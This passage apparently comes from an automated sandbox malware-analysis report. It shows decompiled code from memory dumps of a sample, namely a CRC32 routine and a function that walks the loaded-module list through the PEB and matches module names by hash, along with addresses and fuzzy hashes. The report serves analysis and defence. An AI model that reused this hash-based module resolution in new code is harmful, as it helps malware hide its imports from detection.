                          							_t39 = ((((_t27 ^  *_t75) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & (_t27 ^  *_t75)) * 4)) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & ((_t27 ^  *_t75) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & (_t27 ^  *_t75)) * 4))) * 4)) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & (((_t27 ^  *_t75) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & (_t27 ^  *_t75)) * 4)) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & ((_t27 ^  *_t75) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & (_t27 ^  *_t75)) * 4))) * 4))) * 4)) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & ((((_t27 ^  *_t75) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & (_t27 ^  *_t75)) * 4)) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & ((_t27 ^  *_t75) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & (_t27 ^  *_t75)) * 4))) * 4)) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & (((_t27 ^  *_t75) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & (_t27 ^  *_t75)) * 4)) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & ((_t27 ^  *_t75) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & (_t27 ^  *_t75)) * 4))) * 4))) * 4))) * 4) ^  *_t76;
                          							_t75 =  &(_t76[1]);
                          							_t27 = (((_t39 >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & _t39) * 4)) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & (_t39 >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & _t39) * 4))) * 4)) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & ((_t39 >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & _t39) * 4)) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & (_t39 >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & _t39) * 4))) * 4))) * 4)) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & (((_t39 >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & _t39) * 4)) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & (_t39 >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & _t39) * 4))) * 4)) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & ((_t39 >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & _t39) * 4)) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & (_t39 >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & _t39) * 4))) * 4))) * 4))) * 4);
                          							_t70 = _t70 - 1;
                          						}
                          						_t71 = _t73;
                          						if(_t71 != 0) {
                          							do {
                          								_t28 = _t27 ^  *_t75;
                          								_t75 = _t75 + 1;
                          								_t27 = _t28 >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & _t28) * 4);
                          								_t71 = _t71 - 1;
                          							} while (_t71 != 0);
                          						}
                          					}
                          					_t26 =  !_t27;
                          				}
                          				_a28 = _t26;
                          				asm("popad");
                          				return _t26;
                          			}














                          0x004029d4
                          0x004029d5
                          0x004029d9
                          0x004029e2
                          0x004029e6
                          0x004029ec
                          0x004029f1
                          0x004029f7
                          0x004029ff
                          0x00402a01
                          0x00402a0c
                          0x00402a0f
                          0x00402a10
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00402a10
                          0x00402a14
                          0x00402a17
                          0x00402a1a
                          0x00402a1e
                          0x00402a55
                          0x00402a57
                          0x00402a8b
                          0x00402a8e
                          0x00402a8e
                          0x00402a91
                          0x00402a95
                          0x00402a97
                          0x00402a97
                          0x00402a99
                          0x00402aa4
                          0x00402aa7
                          0x00402aa7
                          0x00402a97
                          0x00402a95
                          0x00402aaa
                          0x00402aaa
                          0x00402aac
                          0x00402ab0
                          0x00402ab1

                          Memory Dump Source
                          • Source File: 00000000.00000002.907773055.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.907767109.0000000000400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.907785402.0000000000415000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.907795683.00000000004A0000.00000004.00020000.sdmp Download File
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 5f39fa327c75608c0a161e98e355e11108031192147f1793d7a103cb0e814a40
                          • Instruction ID: 8dc71014d8856f8ef2ad0e1c9cf09a1ab0c18a5277cabcb9e4e86e23f7506178
                          • Opcode Fuzzy Hash: 5f39fa327c75608c0a161e98e355e11108031192147f1793d7a103cb0e814a40
                          • Instruction Fuzzy Hash: 4B21BE76AB0A9317DB618D38C8C83B263D0EF99700F980634CF40D37C6D678EA21DA84
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 90%
                          			E0040317B(intOrPtr _a4) {
                          				signed int _v8;
                          				intOrPtr _v12;
                          				void* __ecx;
                          				intOrPtr _t17;
                          				void* _t21;
                          				intOrPtr* _t23;
                          				void* _t26;
                          				void* _t28;
                          				intOrPtr* _t31;
                          				void* _t33;
                          				signed int _t34;
                          
                          				_push(_t25);
                          				_t1 =  &_v8;
                          				 *_t1 = _v8 & 0x00000000;
                          				_t34 =  *_t1;
                          				_v8 =  *[fs:0x30];
                          				_t23 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0xc)) + 0xc));
                          				_t31 = _t23;
                          				do {
                          					_v12 =  *((intOrPtr*)(_t31 + 0x18));
                          					_t28 = E00402C77(_t34,  *((intOrPtr*)(_t31 + 0x28)));
                          					_pop(_t26);
                          					_t35 = _t28;
                          					if(_t28 == 0) {
                          						goto L3;
                          					} else {
                          						E004032EA(_t35, _t28, 0);
                          						_t21 = E00402C38(_t26, _t28, E00405D24(_t28) + _t19);
                          						_t33 = _t33 + 0x14;
                          						if(_a4 == _t21) {
                          							_t17 = _v12;
                          						} else {
                          							goto L3;
                          						}
                          					}
                          					L5:
                          					return _t17;
                          					L3:
                          					_t31 =  *_t31;
                          				} while (_t23 != _t31);
                          				_t17 = 0;
                          				goto L5;
                          			}














                          0x0040317f
                          0x00403180
                          0x00403180
                          0x00403180
                          0x0040318d
                          0x00403196
                          0x00403199
                          0x0040319b
                          0x004031a1
                          0x004031a9
                          0x004031ab
                          0x004031ac
                          0x004031ae
                          0x00000000
                          0x004031b0
                          0x004031b3
                          0x004031c2
                          0x004031c7
                          0x004031cd
                          0x004031e0
                          0x00000000
                          0x00000000
                          0x00000000
                          0x004031cd
                          0x004031d7
                          0x004031dd
                          0x004031cf
                          0x004031cf
                          0x004031d1
                          0x004031d5
                          0x00000000

                          Memory Dump Source
                          • Source File: 00000000.00000002.907773055.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.907767109.0000000000400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.907785402.0000000000415000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.907795683.00000000004A0000.00000004.00020000.sdmp Download File
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
                          • Instruction ID: 125f84157e295c2adc52e6f8c9cb261871d96e12da6c9e12f7e31892ee598d11
                          • Opcode Fuzzy Hash: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
                          • Instruction Fuzzy Hash: 0B01A272A10204ABDB21DF59C885E6FF7FCEB49761F10417FF804A7381D639AE008A64
                          Uniqueness

                          Uniqueness Score: -1.00%